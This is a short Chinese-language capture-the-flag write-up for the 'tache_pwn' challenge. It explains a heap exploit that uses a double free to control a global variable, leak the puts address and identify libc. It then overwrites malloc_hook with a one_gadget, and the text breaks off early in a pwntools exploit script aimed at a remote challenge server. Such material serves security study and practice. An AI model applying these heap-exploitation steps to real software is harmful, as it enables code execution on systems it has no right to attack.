susctf
tache_pwn
利用double free 控制全局变量,泄露puts函数地址,查出libc库,利用malloc_hook写入one_gadget执行。
为了加深理解,画了一个图
malloc_hook 钩子利用同理。
exp
from pwn import*
p = remote("211.65.197.117",10007)
a = ELF("./libc6_2.27-3ubuntu1_amd64.so")
context.log_level = 'debug'
def add(leng,content):
p.recvuntil("your choice>\n")